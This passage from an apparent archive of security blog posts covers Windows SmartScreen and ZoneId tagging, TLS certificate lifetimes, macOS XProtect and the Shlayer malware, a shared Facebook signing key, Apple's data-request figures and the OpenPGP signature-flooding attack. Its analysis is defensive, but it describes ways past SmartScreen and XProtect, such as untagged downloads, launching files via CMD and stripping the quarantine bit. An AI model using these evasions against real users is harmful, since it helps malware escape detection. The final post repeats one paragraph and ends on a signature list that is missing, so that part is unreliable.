collapse the Internet and "break it down". Fortunately, the responsibility of all the actors within the industry has served to avoid the worst-case scenario. Unfortunately, we have experienced serious issues on the network, but they have been caused by other, much less significant bugs, riding on "traditional worms" such as WannaCry. This perhaps offers an interesting perspective on the maturity of the industry on the one hand and, on the other, the huge amount of work still to be done in some even simpler areas.
June 22, 2020
Cyber Security
Most Software Handling Files Overlooks SmartScreen in Windows
SmartScreen is a component of Windows Defender aimed at protecting users against potentially harmful attacks, whether in the form of links or files. When a user is browsing the Internet, the SmartScreen filter analyses the sites visited and, if the user accesses a website considered suspicious, it displays a warning message so that the user can decide whether or not to continue. But it also warns about downloaded files. We have conducted a study on how SmartScreen works, particularly in this area, and have tried to understand what triggers this protection component developed by Microsoft, in order to better gauge its effectiveness.
How Does SmartScreen Know Which File to Analyse?
Alternate Data Streams (ADS) are a feature of the NTFS file system that allows metadata to be stored in a file, whether as a stream directly or as another file. Currently, ADSs are also used by different products to tag files in the ":Zone.Identifier" stream, so that it is known when a file is external (i.e. not created on your own computer) and therefore needs to be examined by SmartScreen. Microsoft began tagging all files downloaded through Internet Explorer (at the time), and other browser developers began doing the same to take advantage of SmartScreen's protection. The value written to the stream, the ZoneId, can take any value you wish. However, SmartScreen's behaviour is based on the values reflected in the table below. Activating the value in any file is easy from the command line, or from any language that can open an alternate data stream (see the example below).
Do Browsers Use This Feature to Tag Files?
We analysed the 10 most used browsers on desktop operating systems. To do this, we downloaded a file from a web page. Is the ZoneId added to the downloaded file? In most cases it is.
What About FTP, Code Versioning, Cloud Sync or File Transfer Clients?
We then examined other programs capable of downloading files. For example, most email clients do not add the ZoneId to be scanned by SmartScreen. However, many desktop instant messaging clients do. No FTP or code versioning client adds the appropriate ZoneId, so files obtained by these means will not be analysed by SmartScreen. Nor do cloud sync clients bother tagging files. The same goes for the file transfer mechanisms integrated in Windows. At least WinZip and the native Windows decompressor do respect this option if the file is decompressed after the download.
Potential Evasions
After understanding how and when the file is tagged, the research led us to look at which process is responsible for running SmartScreen and whether there are ways to bypass it. To conduct the test, we tagged files, mostly interpreted ones, known to SmartScreen as malicious, to find out whether a file executed in this way bypassed SmartScreen. We took a series of files in different interpreted languages and set the bit, as mentioned above. The result can be seen in the following table. Perhaps the most interesting point is the difference when launching them using the start command, where SmartScreen gets in the way of PowerShell but not of CMD.
Conclusions
In the following table, we can observe the percentage of programs that do NOT set the ZoneId when a file is downloaded so that it can be analysed by SmartScreen. In general, we can conclude that a potential attacker has several ways to get a malicious file onto a computer with a good chance of it not being flagged by SmartScreen: by relying on the user to download executables through certain programs.
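As promised above, a hedged sketch of the tagging itself (the file path is ours; Python is just one of many ways to touch an alternate data stream). ZoneId=3 marks a file as coming from the Internet, which is what makes SmartScreen examine it:

# Tag a file as downloaded from the Internet (ZoneId=3) via its
# NTFS alternate data stream; this only works on Windows/NTFS.
path = r"C:\temp\sample.exe"  # illustrative file
with open(path + ":Zone.Identifier", "w") as ads:
    ads.write("[ZoneTransfer]\nZoneId=3\n")

# Read the tag back to confirm it is there.
with open(path + ":Zone.Identifier") as ads:
    print(ads.read())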
We believe that both developers and users need to be aware of how SmartScreen works in order to take advantage of its detection capabilities and better protect users. The full report is available here:
June 16, 2020
Cyber Security
More Certificates with Shorter Lifetimes: Where Is TLS Heading?
These are turbulent times for cryptography. Although the ordinary user does not perceive it, the world of encrypted and authenticated websites (which does not in itself make them safe) is going through a deep renewal of everything established. Something in principle as immutable as cryptography is going through a strange moment, and we don't know how it will end. What is certain is that we will have to revise our traditional beliefs about how the web works. Let's review some recent events that will turn everything upside down.
Apple and Its Increasingly Shorter Certificates
Browsers have been steering the course of the Internet and, in particular, of cryptography. Chrome has long been in a relentless fight to do away with HTTP and make everything HTTPS. It has followed this incremental strategy for years, flagging as insecure those webpages that lack encryption and authentication and, in turn, raising the security bar for those that have them; for instance, setting aside certificates that use SHA-1, first in the leaf certificate, then in the intermediates, etc. But this time, curiously, it was not Chrome but Apple, with Safari, that decided to shorten certificate lifetimes to one year. This had been discussed and voted on several times by the parties involved: the browsers wanted a maximum of one year, the CAs did not. Now Safari says it will flag certificates valid for more than one year as invalid from September 2020. The main agents of the Internet and the CAs voted in September 2019 on whether the lifetime of TLS/SSL certificates should be reduced (even further), enforcing a shorter maximum. The result was (again) no: 35% voted for the reduction, including Google, Cisco, Apple, Microsoft, Mozilla, Opera and Qihoo360. The rest, particularly the CAs, voted against, so officially the maximum certificate lifetime remains 825 days. However, in February, at the CA/B Forum in Bratislava, Apple announced that its maximum will be 398 days. Just like that, without notice or statements about it. From September 1, it will distrust certificates created from that date onwards whose lifetime is more than 398 days. Will this sweep the other browsers along? The whole industry? Safari, thanks to the iPhone, holds 18% of the market, so it has enough weight to push it through. In our view, it is a way of taking the pulse of its own leadership.
Facebook and Its Ephemeral Certificates
There are essentially three technologies that browsers can implement to check the revocation status of a digital certificate. The first is the downloadable revocation blacklist known as the Certificate Revocation List (CRL), defined in RFC 5280; history has shown that it does not work. The second is OCSP, defined in RFC 6960, which works with a request-response mechanism that asks the CA about a specific certificate; the most effective variant so far (without really being effective) is OCSP Must-Staple, but it is not widely used. The third is CRLSets, a "fast" revocation method used only in Chrome, as they say, for "emergency situations": a set of certificates gathering information from other CRLs, downloaded from a server and processed by Chrome. Although the mechanism itself is transparent, the management of which certificates are on the list is completely opaque, and the certificates used to update it are not known (unless discovered by other means). As none of this works as it should, "delegated credentials" were born.
They amount to shortening certificate lifetimes to a few hours; not exactly, but they play with the concept of the ephemeral to tackle the problem. What a server does is use its certificate to sign small data structures, valid for days or hours, and delegate them to the servers that will actually handle the TLS session with the browser. That is, instead of creating shorter certificates signed by the intermediate CA and deploying them, these are simplified into a kind of "mini-certificate" signed by the leaf certificate. By using the leaf certificate's private key, we leave behind all the complexity of the intermediate and root CAs. The system delegates this credential to the front-end servers and, if the browser supports it, verifies it rather than the "traditional" certificate. If the delegated credential is validly signed by the leaf certificate (the browser has the leaf's public key to verify this), then the public key inside the delegated credential, not the certificate's, is used for the TLS connection. This is the key point: it provides a much more dynamic formula in case of revocation, one that does not depend on any CA and is very quick to deploy (a stolen delegated credential expires within hours, and the attacker cannot sign new ones without the leaf key). In addition, it is not necessary to leave the private key on every server or intermediate proxy: a single system could issue all the credentials delegated to web servers, load balancers, etc.
Let's Encrypt and Its Many Certificates
Let's Encrypt upended the game by offering free certificates that can be issued automatically. Its philosophy was to move towards "HTTPS everywhere" without having to pay for it. Its first certificate was born in September 2015. By June 2017 it had issued 100 million certificates, and on February 27 it reached a billion. That's a lot of certificates, and it means a clear success for the organisation involved, but also a bit of a problem for other projects such as Certificate Transparency. While Certificate Transparency cannot be used for revocation, it does allow all certificates (fraudulent or not) to be registered and, therefore, makes it easier to detect the fraudulent ones and then revoke them by the "usual" methods. Certificate Transparency was born with a privacy issue and had its enforceability delayed for several reasons: implementations that never materialised, headers adopted with very little uptake, RFCs that started out too constrained, and so on. Even so, Certificate Transparency is in good health (or at least not as bad as HPKP), though Google has been overly ambitious with the proposal. Bringing together so many actors is complicated, even more so in an environment as critical as TLS security. Moreover, it now faces insane growth that may strain its infrastructure. Source: sslmate.com. Some Certificate Transparency logs are close to one billion certificates. To better manage this system, which aims to cover everything and be "read only", the logs ended up being split by year: certificates that expire within a given year go into different log servers that later (normally) no longer receive certificates. Source: sslmate.com. But if we take, for example, the Google Argon 2019 servers (already almost stable at 850 million certificates for the whole of 2019) and compare them with Argon 2020, we see that the latter holds 400 million in just two months, almost half of the former.
At this rate, it could reach 2,400 million certificates (if not more), thanks precisely to the growth of Let's Encrypt and the policy of increasingly shorter certificates. Source: sslmate.com. How will all this fit into the future TLS ecosystem? We will find out little by little.
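As a closing practical note on the lifetimes discussed above, a hedged sketch (the hostname is illustrative) that retrieves a live site's certificate and measures its validity period against the 398-day limit Safari will enforce:

import socket
import ssl

host = "example.com"  # illustrative host
ctx = ssl.create_default_context()
with socket.create_connection((host, 443), timeout=10) as sock:
    with ctx.wrap_socket(sock, server_hostname=host) as tls:
        cert = tls.getpeercert()

# Convert the notBefore/notAfter strings to epoch seconds and diff them.
days = int((ssl.cert_time_to_seconds(cert["notAfter"])
            - ssl.cert_time_to_seconds(cert["notBefore"])) // 86400)
print(host, days, "days",
      "(over Safari's 398-day limit)" if days > 398 else "")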
March 2, 2020
Cyber Security
Apple introduces 14 new signatures in XProtect amid the malware flood for Mac
Shlayer malware is on one out of every ten Mac computers, and it has been like that for two years. It is malware that mainly abuses the advertising system. Given this overwhelming statistic (10% of systems infected and a campaign that has now been running for two years), we asked ourselves one question: what is the operating system doing to defend itself? We are aware that XProtect, the built-in anti-malware software, detects little and badly. But how has it responded to an epidemic of such dimensions?
Shlayer Trojan
We won't dwell on how it works, since the original analysis already provides all the details. It is interesting to know that it usually pretends to be a Flash update that downloads an encrypted file. This file, once decrypted, downloads the real Trojan with curl. The code in the image deobfuscates a file that ends up doing something like this: This in turn leads to the installation of very aggressive adware. This simple behaviour has given users more than a headache for two years now. By the way, that curl -F0L is their "trademark", because these are not usual curl parameters.
What is XProtect
XProtect is a basic signature-based malware detection system that was introduced in September 2009. It constitutes a first approach to an antivirus integrated into MacOS. Currently, XProtect has a few more signatures, which can be found in the clear (malware name and detection pattern) in this path: /System/Library/CoreServices/XProtect.bundle/Contents/Resources/ XProtect contains signatures on the one hand and Yara rules on the other (defined by XProtect.plist and XProtect.yara in that directory), and malware is detected and defined with both systems. GateKeeper relies on both: it monitors files and hands them over for checking. The XProtect.plist list is public. The number 3 in the URL refers to Mountain Lion; changing it to 2 shows the Lion signature file, and 1 corresponds to Snow Leopard. Apple does not seem keen to talk too much about it. Let's go back to the initial question.
Another complementary script to the most popular malware for Mac
Has Apple taken the matter into its own hands? Yes, but only recently, when it introduced several Yara rules to detect these samples (rules which in principle are a mystery, since no details are offered about them). For example, on January 22nd the following 4 rules were introduced: MACOS.8283b86, MACOS.b264ff6, MACOS.f3edc61 and MACOS.60a3d68. A few days before, on January 7th, 3 additional signatures or Yara rules were introduced: MACOS_5af1486, MACOS_03b5cbe and MACOS_ce3281e. And in December, 7 more: MACOS_9bdf6ec, MACOS_e79dc35, MACOS_d92d83c, MACOS.0e62876, MACOS.de444f2, MACOS.b70290c and MACOS.22d71e9. That makes a total of 14 signatures in two months. Considering that in 10 years they have accumulated little more than 100 signatures, it may be concluded that they have been working hard in recent months. It is unusual to see so many signatures in such a short space of time, so yes, it seems that they have lately been worried about malware on Mac. Now we ask ourselves another question: are these rules effective? With these XProtect Yara rules we performed retrohunting in VirusTotal to see how long malware of this type has existed. Retrohunting involves searching back in time for files that match certain Yara rules: VirusTotal returns every sample matching them, giving us an idea of how many have appeared over time. Over 1,000 samples were found in less than three months.
The interesting point is that there are samples from well before December 2019 (when detection rules began to be introduced in XProtect). This suggests that the protection rules Apple has added in recent months came late. Exploring the results of the retrohunt, we located samples that were not flagged by antiviruses. At first we thought these were false positives, but subsequent analysis showed that they are rules for detecting browser plugins and specific adware, such as Wharkike, EngineFiles, ContentBenefits, ForwardOpen-extension… This leads us to an interesting conclusion: XProtect detects adware (mainly search-engine hijackers) not detected by any antivirus. However, it seems that some false positives have crept in (we believe the mdworker_share module is sometimes flagged as a false positive). Again as a curiosity, a thousand samples in about 70 days gives an average of almost 15 samples uploaded to VirusTotal per day. Most samples are detected because they are the decryption script shown in the image above. This is an early stage of the attack, which may be positive.
Conclusions
Indeed, it seems that XProtect (in a totally opaque way) has moved up a gear and in a few days has created more detection rules than ever. These rules are catching a lot of malware at its earliest stage, and even do a better job than antiviruses. Nevertheless, there is a big "but": the rules are late and, in addition, open to the attacker. Attackers will be tempted to go unnoticed simply by looking at what XProtect detects and modifying their samples as needed. This doesn't mean the rules are bad, but they are easily bypassed. For example, if we analyse some of the strings on which they rely to detect malware, we can see how it is done:
Example of one of the 14 Yara rules introduced
Its strings can be decoded into this: they are, in turn, commands typically used by the malware, and by simply modifying one byte the rules could be bypassed.
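Retrohunting happens on VirusTotal's side, but the matching itself can be reproduced locally. A hedged sketch assuming the yara-python package and the rule path as shipped on macOS; the samples folder is ours:

import os
import yara  # pip install yara-python

# Compile Apple's own rule file (path as cited above).
rules = yara.compile(
    "/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara")

for name in os.listdir("samples"):        # illustrative folder of samples
    path = os.path.join("samples", name)
    matches = rules.match(path)
    if matches:
        print(path, "->", [m.rule for m in matches])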
February 3, 2020
Cyber Security
Facebook signed one of its apps with a private key shared with other Google Play apps since 2015
Facebook Basics is a Facebook app aimed at countries with poor connectivity, providing a free access service to WhatsApp and Facebook. It has been discovered that the Android version used a "Debug" certificate shared by other, unrelated applications in other markets. Moreover, at ElevenPaths we have verified that this certificate had been shared with Chinese apps on Google Play since 2015. This means that they shared a private key and could even have influenced the original app. A few days ago, the owner of the Android Police site reported that the same certificate used to sign the Facebook Basics app was being used by many other apps in other markets, with no apparent relationship between them. Facebook has downplayed the issue, claiming that there is no evidence that the certificate has been exploited and that it has already been fixed. However, it is not that simple, and both the consequences and the potential causes are nothing but bad news.
Causes
Android APKs must be signed with self-signed certificates. This somewhat breaks the usual chain-of-trust rules, but at least it preserves the integrity of the app and allows it to be updated. If you sign an app with a certificate and upload it to Google Play, you will never be able to change the certificate (or the package name) if you wish to update it. If you lose the certificate, you will have to create a different app, and this is what Facebook has done to "fix" it. Nevertheless, Facebook has not (supposedly) lost the private key of the signing certificate. They have done something different (worse?), about which we can only speculate. To begin with, they used an "Android Debug" certificate without real data filled in. This, besides looking bad, means they let the typical test certificate reach production. How is it possible that third parties use this certificate? The certificate might be public. There are such cases: some developers use one out of ignorance or because they make no effort to develop high-quality apps... But Facebook may also have lost control over the certificate, which would imply a lack of security in its development process. Another possibility is that the app was commissioned from a third party (a freelance?) who later signed other work with the same key (which is strongly inadvisable). Furthermore, at ElevenPaths we have ascertained that apps signed with the same certificate were not found exclusively in other markets: as far back as 2015 (when Facebook Basics was released) there were Chinese applications on Google Play signed with it, since taken down from the market.
* App: af739e903e97d957a29b3aeaa7865e8e49f63cb0 Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-09-20 to 2016-10-07.
* App: 063371203246ba2b7e201bb633845f12712b057e Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-10-21 to 2016-06-22.
* App: c6a93efa87533eeb219730207e5237dfcb246725 Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-09-15 to 2015-09-16.
Impact
In addition to the poor image this gives of Facebook (is there any area where its privacy practices have not been brought into question?), an attacker could have taken advantage of this to fraudulently update the Facebook app. How? Well, to update an app it just needs to be signed with the same certificate, plus access to the Google Play account. That's not easy, but Facebook was doing half of an attacker's work.
Moreover, the work needed to perform a potential collusion attack with Android applications would be made easier as well. These are well-known attacks involving different applications which are not malicious by themselves, but which, working together, can mount an attack. An example: combining the permissions of two applications so that, together, they give the attacker more power over the phone, even if each app seems harmless on its own. To achieve this kind of attack, the apps must be signed with the same certificate. Once again, part of the necessary work was being handed to a potential attacker. On top of all this, Facebook did not want to reward the discoverer, because he made the issue public on Twitter before reporting it.
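For the curious: checking which certificate signed an APK (v1 signature scheme) is straightforward. A hedged sketch assuming the cryptography package; the APK file name is ours, and the fingerprint would be compared against the 5E8F1606... value quoted above:

import zipfile
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import pkcs7

apk = zipfile.ZipFile("app.apk")  # illustrative APK
# The v1 signature block lives in META-INF as a PKCS#7 blob.
sig_name = next(n for n in apk.namelist()
                if n.startswith("META-INF/") and n.endswith((".RSA", ".DSA", ".EC")))
for cert in pkcs7.load_der_pkcs7_certificates(apk.read(sig_name)):
    # Print the SHA-1 fingerprint of each embedded signing certificate.
    print(cert.fingerprint(hashes.SHA1()).hex().upper())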
September 9, 2019
Cyber Security
A government is known by the Apple data it requests
Sometimes, governments need the support of huge corporations to carry out their work. When a threat depends on knowing the identity of, or gaining access to the data of, a potential attacker or a victim in danger, the digital information stored by these companies may be critical to an investigation and, consequently, to avoiding a disaster. Apple has published a full transparency report on government requests, explaining which requests are made and the extent to which they are granted, ranging from App Store takedown requests to account access requests. Which government requests what? To make it clear, we have created a number of graphs identifying what concerns governments most.
Device-based Requests
The following graph represents requests based on devices: for instance, when law enforcement agencies are working on behalf of customers regarding lost or stolen devices. Apple also receives requests related to fraud investigations. Device-based requests generally seek details of Apple customers associated with devices or device connections to Apple services (for example, a serial number or IMEI number).
Device Requests by country
Without a doubt, China is the country that submitted the most requests for details of customers associated with devices or device connections to Apple services. We can imagine that the figures have soared due to piracy and fraud in the country.
Financial Identifier-based Requests
Examples of such requests are cases where law enforcement agencies are working on behalf of customers who have requested assistance regarding suspected fraudulent credit or gift card activity used to purchase Apple products or services.
Financial Identifier Requests by country
The U.S. and Germany are the countries that submitted the most financial identifier requests. This may be explained by the increasing number of credit card frauds in the U.S. (although it may not seem to be the case, in the U.S. credit card signatures are still commonly used to validate a payment). In this case, requests are granted to a lesser extent than in the previous one.
Account-based Requests
Examples of such requests are cases where law enforcement agencies suspect an account may have been used unlawfully or in violation of Apple's terms of service. They usually seek details of customers' iTunes or iCloud accounts, such as a name and address, and in certain instances customers' iCloud content (iOS device backups, stored photos, contacts…).
Account Requests by country
This is perhaps the most intrusive measure, since Apple hands over private content. Again, China and the U.S. are the countries that submitted the most account requests. Interestingly, China's requests were granted in 98% of cases, while the U.S.'s were granted in "only" 88%. Apple has the power to reject a request if it considers there is a problem of form or content. It must be taken into account that Apple, in addition to providing data, can also provide metadata not directly linked to the data itself. Such a case is not counted as a "granted" request, although it involves providing information as well.
Account Preservation-based Requests
Under the U.S. Electronic Communications Privacy Act (ECPA), government agencies may ask Apple to freeze accounts for 90 to 180 days. This is the step prior to requesting access to accounts (while they obtain legal permission to request the data), and it prevents the individual under investigation from deleting the account.
Account Preservation Requests by country
The U.S.
is the country that submitted the most account preservation requests. It is remarkable that on this occasion China has disappeared from the graph, even though this is considered a step prior to requesting account access, an area where the country is quite active. Could it be that China has little trouble obtaining legal permission?
Account Restriction/Deletion Requests
Examples of such requests are cases where government agencies ask to delete a customer's Apple ID or to restrict access to it. They are quite unusual. The U.S. submitted 6 requests and 2 of them were granted. The remaining countries submitted just one or two, and none was granted.
Account Restriction/Deletion Requests by country
Emergency Requests
Also under the U.S. Electronic Communications Privacy Act (ECPA), Apple may be asked to disclose account information to a government entity in emergency situations, if Apple considers that an emergency involving imminent danger of death or serious physical injury to a person requires such disclosure without delay.
Emergency Requests by country
Interestingly, here the winner is the United Kingdom with 198 requests, even though they were not always granted, closely followed by the U.S. The remaining countries submitted around 10 requests each, and most of them were rejected. Is the United Kingdom mainly worried about emergencies, and consequently only requests data in such cases?
App Store Takedown Requests
These are usually related to apps that are believed to be unlawful.
App Store Takedown Requests by country
China is far and away the country that submitted the most App Store takedown requests, curiously followed by Norway, Saudi Arabia and Switzerland. On this occasion, the U.S. (quite active on data access requests in general) has completely disappeared from the graph. The report also covers private party requests made through legal process: up to 181 requests, 53 of them granted by Apple for access to information.
Conclusions
They are complex. We can look at this from two different points of view: we can conclude that some governments request data access "all too often", but we could also argue that perhaps the justice systems of those countries work in a more agile and effective manner, or that fraud is mostly located there. You may interpret it as you wish. Only the following data-based conclusions seem clear: China's interest in deleting applications it considers unlawful. The United Kingdom's involvement (the U.S.'s as well, but the UK only appears in this category) in emergency situations. The U.S.'s preventive actions, since it requests account freezes much more often than the remaining countries. Germany's high involvement (again, along with the U.S.) in financial frauds related to Apple products. China, the U.S., Taiwan and Brazil are the countries that requested the most personal data. Please note that throughout this post we have reproduced the graphs published by Apple itself. It is important to point out that all requests are submitted in batches. For instance, Apple counts the number of App Store takedown requests, and each request may in turn include an undetermined number of apps. The same goes for account requests and the number of accounts included in each request. When Apple talks about the percentage of granted requests, it refers to requests, not to specific accounts. For example, Apple receives 10 requests, together covering 100 accounts.
Later, it states that it has granted 90% of those requests, but we do not know how many individual accounts have been provided. However, the graphs show the total amount against that percentage. Even though it is not an exact exercise, it may give us an approximate idea of the real amount of data provided.
July 8, 2019
Cyber Security
The attack against OpenPGP infrastructure: consequences of a SOB’s actions
What is happening with the attack against the OpenPGP infrastructure constitutes a disaster, according to the affected people who maintain the protocol. Robert J. Hansen, who communicated the incident, has literally described the attacker as a "son of a bitch", since public certificates are being vandalised by taking advantage of essentially two functionalities that have become serious problems.
A little background
On the peer-to-peer public certificate networks, where anyone may find someone else's PGP public key, nothing is ever deleted. This was decided by design in the 90s in order to withstand potential attacks from governments wishing to censor. Let us remember that the whole free encryption movement was born as an expression of "rebelliousness", precisely because of the attempts of the highest circles to control cryptography. Since there is no centralised certification authority, PGP is based on something much more horizontal: it is the users themselves who sign a certificate, attesting that it belongs to the user in question. Anyone can sign a public certificate, attesting that it belongs to whom it claims to belong. In the 90s, people met to swap floppy disks with their keys so that others could sign their public keys, whether they knew each other or not. The spread of the Internet brought along a network of servers hosting public keys. There you may find the keys and, if appropriate, also sign one, attesting that it belongs to the individual in question. Anyone can sign them an unlimited number of times, vouching with their own signature that the certificate belongs to whom it claims to belong. Each signature attaches a given number of bytes to the certificate. Forever.
The attack
The attack being performed consists of signing public certificates thousands of times (at up to 150,000 signatures per hour) and uploading them to the peer-to-peer certificate networks, from which they will never be deleted. In practice, valid certificates soon reach a size of several tens of megabytes. They are signed without data, as you can see in the following image. So far the attacker has focused on two prominent figures of the OpenPGP community: Robert J. Hansen and Daniel Kahn Gillmor. The problem is that, under these circumstances, Enigmail and any other OpenPGP implementation simply stop working, or take a very long time to process such oversized certificates (several tens of megabytes slow the process down to tens of minutes); for example, 55,000 signatures make a certificate of 17 megabytes. In practice, this disables the keyring: anyone wishing to verify Daniel's or Robert's signatures will break their installation while importing them. Consequently, the attack takes advantage of two circumstances that are difficult to address (they are features by design), so it is pure vandalism. First, there is no limit on the number of signatures; a limit would pose a problem too, since an attacker could exhaust a certificate's quota of trusting signatures and thereby prevent anyone from ever trusting it again. Second, SKS servers replicate content, and this is part of the design in case an agency should ever intervene; this way, what is uploaded cannot be deleted. Why hasn't it been fixed? The synchronising server software, called Synchronizing Key Server (SKS), is open source, but in practice it is unmaintained.
It was created as the keystone of Yaron Minsky's Ph.D. thesis, and it is written in a programming language called OCaml. (He considers himself an "occasional programmer" of this language, although we hope that is just modesty.) As strange as it may sound, no one knows how it works, so it would be necessary not only to fix it, but to question the design itself as well. Mitigations are being suggested: do not refresh the affected keys, or refresh them from the server keys.openpgp.org, which implements a number of constraints against the problem in exchange for losing other functionality. According to Hansen himself, the current network is unlikely to be saved. But the worst may be yet to come. Software packages in distribution repositories are usually signed with OpenPGP. What if the attackers go after those certificates? Software updates from distributions could become really slow and useless, endangering the updating of systems that may be critical. And this may encourage copycat attackers, since exploiting the flaw is relatively simple.
Conclusions?
It was already known that the network could be misused, but no one expected such an act of wanton vandalism. According to the affected people, they cannot understand its purpose, other than destroying the altruistic work of people trying to make encryption an unrestricted right. Defeatism can be perceived in the affected people's messages, where they show frustration, anger and a certain pessimism, with sentences such as "this is a disaster that could be foreseen" and "there is no solution". This final sentence is devastating: But if you get hit by a bus while crossing the street, I'll tell the driver everyone deserves a mulligan once in a while. You fool. You absolute, unmitigated, unadulterated, complete and utter, fool. Peace to everyone — including you, you son of a bitch. (A "mulligan" is golf jargon for a second chance.) A number of points have caught our attention: The fact that the core code of the network is written in such a little-known language, and that it has hardly been maintained since, precisely because it worked so well. The fact that GnuPG (the reference OpenPGP implementation) and Enigmail (which, after all, uses GnuPG) cannot cope with certificates of several megabytes is surprising, to say the least; their capacity to handle databases is quite poor. It reminds us of what happened with OpenSSL after Heartbleed: dozens of defects started to be detected in the code, and the programmers admitted, in a way, that they could not spend more time auditing it. Solutions such as LibreSSL were born in an attempt to program a more secure TLS implementation. Daniel Kahn Gillmor himself admits it: "As an engineering community, we failed". This damages the image of PGP in general, which is not in very good health anyway; this heavy blow endangers its image as a whole, not just its servers (these being merely the excuse for the attack). It is an interesting issue for several reasons that lead to a number of unknowns: what is going to happen with OpenPGP in general, with the protocol itself, with its most common implementations, with the servers… And, above all, what the attacker's plan is (or the copycat attacks it may inspire): whether it will move on from personal certificates to those that sign packages, and how distributions will react.
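A final practical note: a flooded certificate can be spotted before it ever touches a keyring by counting its signature packets. A hedged sketch (the key file name is ours) using GnuPG itself:

import subprocess

# Dump the OpenPGP packets of an exported key without importing it.
out = subprocess.run(
    ["gpg", "--list-packets", "suspect-key.asc"],  # illustrative file
    capture_output=True, text=True, check=True).stdout

# Each attached signature shows up as a ":signature packet:" line.
sigs = sum(1 for line in out.splitlines()
           if line.startswith(":signature packet"))
print(sigs, "signatures attached to this certificate")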
July 1, 2019
Cyber Security
How the "antimalware" XProtect for MacOS works and why it detects poorly and badly
Recently, MacOS included a signature in its integrated antivirus intended to detect a Windows binary; but does this detection make sense? We could think it does, as a reaction to the fact that in February 2019 Trend Micro discovered malware created in .NET for Mac, which ran through a Mono implementation bundled in the malware itself. OK, but now seriously, does it make sense? It might make sense to occasionally include a very particular detection that has been widely covered in the media, but in general the long-term strategy of this antivirus is not so clear, even though it is intended to detect "known" malware. MacOS's fight against malware as a whole is absolute nonsense. Apple moved from categorical denial during the early years of the 21st century to slight acceptance and finally, since 2009, to fighting malware half-heartedly. However, it has not evolved much since then. Let's continue with the detection of the Windows executable: the malware was detected in February, which means that it had been operating for some time. Trend Micro discovered it and the media made it public, denting Apple's reputation. On 19 April, Apple included its signature in XProtect. That is an unacceptable reaction time. On top of all this, it was the first XProtect signature update in all of 2019. Is it possible that the media coverage of the malware was related to the signature's inclusion? What priority is given to users' security, then? Do we know how much malware XProtect detects and how often this seldom-mentioned functionality is updated? Are Gatekeeper and XProtect, in general, a way to spare Apple's blushes, or are they really intended to help mitigate potential infections in MacOS? At least one of the few official pages about XProtect indicates that it is meant to prevent "known" malware from running (https://support.apple.com/en-in/HT207005).
What is what
Malware on MacOS is a cyclical, recurrent (and sometimes tiresome) subject. However, for those who are starting out in security, it is necessary to remember how dangerous certain long-lived myths are, because there are still big "deniers" out there. XProtect is a basic signature-based malware detection system that was introduced in September 2009. It constitutes a first approach to an antivirus integrated into MacOS, and it is so rudimentary that when it was launched it was only capable of identifying two families that used to attack Apple's operating system, and it only analysed files downloaded through Safari, iChat, Mail and now Messages (leaving out well-known MacOS browsers such as Chrome or Firefox). Currently, XProtect has a few more signatures, which can be found in the clear (malware name and detection pattern) in this path: /System/Library/CoreServices/XProtect.bundle/Contents/Resources/ XProtect contains signatures on the one hand and Yara rules on the other (defined by XProtect.plist and XProtect.yara in that directory), and malware is detected and defined with both systems. GateKeeper relies on both: it monitors files and hands them over for checking. The XProtect.plist list is public. The number 3 in the URL refers to Mountain Lion; changing it to 2 shows the Lion signature file, and 1 corresponds to Snow Leopard. Apple does not seem keen to talk too much about it: searching site:support.apple.com xprotect on Google returns few results.
Relation between xprotect.yara and xprotect.plist with some hashes
GateKeeper has little to do with malware or antivirus, contrary to what is sometimes said.
GateKeeper is a system in place to check that downloaded apps are signed with a known ID. To develop for Apple and publish on the App Store, the developer must obtain (and pay for) an ID to sign their programs, a kind of certificate. According to Apple, "The Developer ID allows Gatekeeper to block apps created by malware developers and verify that apps haven't been tampered with since they were signed. If an app was developed by an unknown developer—one with no Developer ID—or tampered with, Gatekeeper can block the app from being installed". Therefore, Gatekeeper is far from being an anti-malware. Rather, it is a controller of an app's integrity, origin and authorship which, if it detects something untrustworthy, sends it to XProtect and keeps it in quarantine if it comes from a suspicious site. Moreover, MacOS also has MRT, its Malware Removal Tool, very close in spirit to the Malicious Software Removal Tool for Windows. It is used to reactively remove malware that is already installed, and it can only be executed on system start-up. As if that were not enough, to perform disinfection it relies on very specific, common infection paths, so little can be done with it.
Why all this does not seem to work too well
An avoidable bit: XProtect is a signature-based system (no heuristics, no trace of any advanced analysis system) that constitutes just the "basics". Moreover, it is hampered by all kinds of obstacles that prevent it from being effective. GateKeeper is the system that tells XProtect, "I'm going to embed an active quarantine bit into this just-downloaded file; let's see if you detect it". This bit may simply be removed, even without privileges, so it would be easy to dodge XProtect's basic checking. Poor updates in terms of frequency and quantity: for instance, as of this writing in May 2019, XProtect has only been updated twice this year, with a single signature each time. The first update of 2019 took place on 19 April (for the Windows malware mentioned earlier), and the second was launched 10 days later (pushing a rule to detect MACOS.6175e25 within its Yara rules). From 2009 to 2011, it went from 2 to just under 20 signatures. How many signatures does it have currently? In its 2103 version (the latest as of May), 92 signatures can be counted, gathered over almost 10 years.
A poor update record, in both frequency and volume: as of this writing in May 2019, XProtect has been updated only twice this year, with a single signature each time. The first update of 2019 arrived on 19 April (for the Windows malware mentioned above); ten days later came the second, pushing a Yara rule to detect MACOS.6175e25. Between 2009 and 2011 it grew from 2 to just under 20 signatures. How many does it hold today? In version 2103, the latest as of May, 92 signatures can be counted, gathered over almost 10 years. They are the following:

